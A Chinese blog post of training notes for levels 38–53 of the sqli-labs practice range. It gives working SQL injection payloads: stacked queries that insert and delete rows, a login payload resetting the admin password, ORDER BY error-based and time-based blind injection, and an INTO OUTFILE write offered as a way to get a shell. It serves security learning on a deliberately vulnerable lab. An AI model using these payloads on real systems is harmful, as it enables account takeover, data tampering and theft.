sqli-labs-master靶场训练笔记(38-53|boss战)

已于 2024-02-06 18:55:07 修改
阅读量372 收藏 7
点赞数 11
文章标签: 笔记
于 2024-02-05 12:28:03 首次发布
1
本文链接:https://blog.csdn.net/ymy13326056686/article/details/136030427
版权

2024.2.4

level-38 

(堆叠注入) 

这题乍一看感觉又是来卖萌的,这不是和level-1一模一样吗

然后仔细看了一下源代码,根据 mysqli_multi_query 猜测这题的本意应该是堆叠注入

mysqli_multi_query() 是 PHP 中用于执行多个 SQL 查询语句的函数。这个函数允许你在一个连接中执行多个查询,并返回一个结果标识符,以便你可以逐个获取每个查询的结果。

函数的语法:

mysqli_multi_query(mysqli $connection, string $query)
  • $connection:一个有效的 mysqli 连接标识符。
  • $query:要执行的 SQL 查询语句。

返回值:

  • 如果第一个查询语句执行成功,该函数返回一个结果标识符,你可以使用这个标识符来获取查询结果。如果第一个查询语句失败,该函数将返回 FALSE。
  • 对于后续的查询语句,该函数将返回 TRUE 或 FALSE,具体取决于查询是否成功。

利用堆叠注入进行数据库的篡改 

对users表中插入数据:

?id=1';insert into users(id,username,password) value(15,'2024','干杯!') -- a

为了方便这里的查询操作用cmd显示 

对着level-1试了一下,果然不行

删除刚刚插入的数据

?id=1';delete from users where id=15 -- a

(level-38能有什么坏心思呢,他不过可以多线程操作罢了(๑>ڡ<)☆)

level-39 

 (堆叠注入)

和level-39一样,只是改成了数字型

?id=-1 union select 1,2,3;delete from users where id=15 -- a

level-40 

 (堆叠注入)

都是前几关玩剩下的 

?id=-1') union select 1,2,3;delete from users where id=15 -- a

level-41 

 (堆叠注入)

和level-39一样 

?id=-1 union select 1,2,3;delete from users where id=15 -- a

level-42 

(堆叠注入)

普通用户利用堆叠注入可以修改管理员密码 

login_user=Dumb&login_password=Dumb';update users set password='123456' where username='admin' -- a&mysubmit=Login

level-43 

 (堆叠注入)

') 闭合,其他和level-42一样 

login_user=Dumb&login_password=Dumb';update users set password='123456' where username='admin' -- a&mysubmit=Login

level-44 

 (堆叠注入)

 和level-42一样 

login_user=Dumb&login_password=Dumb';update users set password='123456' where username='admin' -- a&mysubmit=Login

level-45 

 和level-43一样

login_user=Dumb&login_password=Dumb');update users set password='123456' where username='admin' -- a&mysubmit=Login

level-46 

 提示传入sort变量

?sort=1

查看源码可以知道是一个数字型的order by注入

可以直接报错注入或者GETSHELL 

?sort=1 and updatexml(1,concat('~',database(),'~'),1)
?sort=1 into outfile "D:/1.txt"

level-47 

 字符型的order by注入

?sort=1' and updatexml(1,concat('~',database(),'~'),1) -- a

level-48

 数字型,时间盲注引发服务器报错(可能不是正解,但能用(doge))

?sort=1 and if(mid((select+database()),1,1)='a',sleep(5),0) -- a

level-49 

改成了字符型,用 ' 闭合,其他和level-48一样,一招鲜吃遍天

?sort=1' and if(mid((select+database()),1,1)='a',sleep(5),0) -- a

level-50 

level-51 

level-52 

level-53

除了可以堆叠注入,均和上几关相同

看起来所有的 boss 都已经被你轻松斩于马下,去挑战独孤求败的自己吧

sqli-labs-master靶场训练笔记(54-65|决战紫禁之巓)-CSDN博客icon-default.png?t=N7T8https://blog.csdn.net/ymy13326056686/article/details/136039776

Z时代.bug(゜▽゜*)
关注
  • 11
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-labs-master靶场训练笔记(1-22|新手村)
ymy13326056686的博客
01-30 941
sqli-labs-master靶场训练笔记
sqli-labs-master靶场训练笔记(21-38|精英级)
ymy13326056686的博客
02-04 1240
sqli-labs-master靶场训练笔记
SQLI-labs 通关笔记靶场安装
fyrmaryt的博客
02-27 571
SQLI-labs通关笔记之安装及介绍篇。
sqli-labs靶场15-19过关笔记
weixin_62884797的博客
04-16 710
15 我们按照老办法,输入单引号查看回显信息,但没有到没有,显然,他极有可能是无回显报错,那就是盲注了。 先bp抓包 发现他是post的请求,我们就在bp中改包注入一下 admin' and 1=1 23% 发现登陆成功,确实有注入点,但是无回显,我们就需要盲注了。 uname=admin' and sleep(5) 23%&passwd=admin&submit=Submit 在bp中,我们等了一会儿他回显的,我们可以确定,可以使用时间盲注了。 uname=adm
SQL注入之sqli-labs
m0_60716947的博客
04-08 7151
目录 (一)搭建 sqli-labs 靶场 (二)sqli-labs的第一关至第四关笔记 (1)第一关 sqli-labs 是一款基于 sql 注入的游戏教程,有利于更好地了解 sql 注入的语法。 (一)搭建 sqli-labs 靶场 搭建 sqli-labs 靶场前首先要下载 phpstudy phpstudy下载链接:https://www.xp.cn 要保证安装路径中不能有空格和中文。 下载完成后: 可以对 root 数据库进行修改密码或创建数据库,然后在软件管理..
sqli-labs靶场通关秘籍分享(1-10关)
weixin_45585955的博客
04-16 2546
一、 1、SQL注入原理:sql语句未经查询直接带入数据库查新,sql注入攻击其实就是服务端的攻击,它与操作系统、服务器类型、脚本语言无关 2、sql注入类型:分为数字型、字符型、搜索型、xx型 3、注入提交方式:get提交、post提交、cookie提交。 4、注入攻击提交支持的类型 union注入、information_schema、宽字节注入、报错注入、盲注,这里的盲注分为三种,分别是 布尔型盲注、时间型盲注、报错型盲注。 updatexml注入分为 insert注入、update注入
靶场sqli-labs的练习笔记(基础知识)第一章
m0_55314368的博客
06-13 223
在获得了数据库名称之后我们来查询表名,表名又有很多种,刚才爆出了emails、referers,uagents,user这些表名,通常我们需要拿到一些敏感数据的时候,我们首先会对user表中的数据感兴趣,先进入user中查看。加入联合语句,查看没有变换,那么已知id=1是正确的,所有后面才有可能不显示,尝试修改让前面的信息报错id=-1,并且判断闭合方式为id=1'这段语句的作用是查询table_schma=当前数据库名称的,刚才根据SQL注入点报错,我们可以得到database()=security。
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2416
sqli-labs靶场之前建议补一下基础。
sqli-labs靶场15-19关通关笔记中总结
weixin_45585955的博客
04-16 3755
第十五关 本关属于时间注入,基于源码分析,闭合字符是单引号。 本关没有错误提示,那么我们只能靠猜测进行注入。这里我直接从源代码中看到了 sql语句。 那这里对 id 进行 ‘ id’ 的处理。 本关我们利用延时注入进行。 uname=admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit 正确的时候可以直接登录,不正确的时候这里会延时 5 秒。 第十六关
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
WEB转Flutter基础学习笔记(内含vue和flutter对比)
小易不止于搬砖的博客
05-17 667
笔者是一名web前端,记录在转栈flutter时的学习笔记,内涵和vue的对比,能够辅助前端同学更容易理解flutter
推荐系统学习笔记(一)
weixin_44880995的博客
05-15 145
同类策略(精排中的两种模型)天然互斥,并且(两条召回通道)效果会相互影响,避免干扰。反转:有的指标立刻影响,有的需要长期观测-------尽快推全也可以长期观测。10%作为holdout桶,实验使用剩余的90%,做diff(需要归一化)不同策略(添加召回通道,优化粗排模型)通常不会干扰,可以作为正交的两层。保留10%,完全不受实验影响,可以考察整个部门对业务指标的贡献。同层互斥----避免一个用户被两个实验影响。不同层正交----每层独立随机分配用户。推全:新层,与其他层正交,90%用户。
并发编程笔记3--synchronize底层实现原理
最新发布
qq_41056506的博客
05-17 737
Java中每一个对象都可以作为锁,具体的表现为以下3中方式当一个线程试图访问同步代码块时,他必须先获得锁。退出或抛出异常必须释放锁。那么锁到底存在哪里呢?锁中存储的是什么信息呢?从JVM规范中可以看到Synchronize在JVM中的实现原理,JVM是基于进入或退出Monitor对象来实现方法同步和代码块同步,但两者的实现细节不一样。1、代码块同步是使用monitorenter和monitorexit指令实现,2、而方法同步是使用另一种方式实现的,细节在JVM规范中并未详细说明。
Vue3实笔记(23)—路由Vue-Router 实指南(关于路由命名那点事儿)
山花的博客
05-15 1040
除了 path 之外,你还可以为任何路由提供 name。在 Vue Router 中,命名路由是一种通过指定名称来标识路由的方式,而不是使用路径。这为路由的跳转提供了一种更直观和易于维护的方式。命名路由特别有用,尤其是在链接到路由时,不必硬编码 URL,也不必在路由对象中查找路径字符串。},在这个例子中,我们给路径为 /user/:username的路由命名为 user。User在这两种情况下,路由将导航到路径 /user/erina。
sqli-labs-master靶场
09-20
sqli-labs-master是一个用于学习和实践SQL注入攻击的靶场。搭建完成后,你可以通过访问"http://localhost/sqli-labs-master/"来访问该靶场。通过点击"Setup/reset Database for labs"可以自动创建数据库、创建表并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Z时代.bug(゜▽゜*)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值